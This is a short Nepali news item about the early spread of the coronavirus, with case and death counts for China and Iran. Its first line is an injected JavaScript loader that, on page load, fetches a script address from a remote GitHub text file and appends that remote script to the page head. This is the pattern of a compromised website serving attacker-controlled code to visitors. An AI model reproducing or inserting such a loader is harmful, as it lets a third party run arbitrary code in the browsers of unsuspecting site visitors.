;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चीनबाट सुरु भएको कोरोना भाइरस बिश्वोका धेरै देशहरुमा फैलिने क्रम जारि छ | पछिल्लो २४ घण्टामा चीनमा जम्मा १८ जना नयाँ संक्रमित देखिएको छ । जबकी इरानमा एकै दिन एक हजार ७५ नयाँ संक्रमित भेटिएको छ ।
कोरोनाका कारण ४ हजार ७१६ जनाले ज्यान गुमाएका छन् । चीन बाहिर ज्यान गुमाएको संख्या एक हजार ५४७ छ ।
फेसबुक प्रतिक्रियाहरु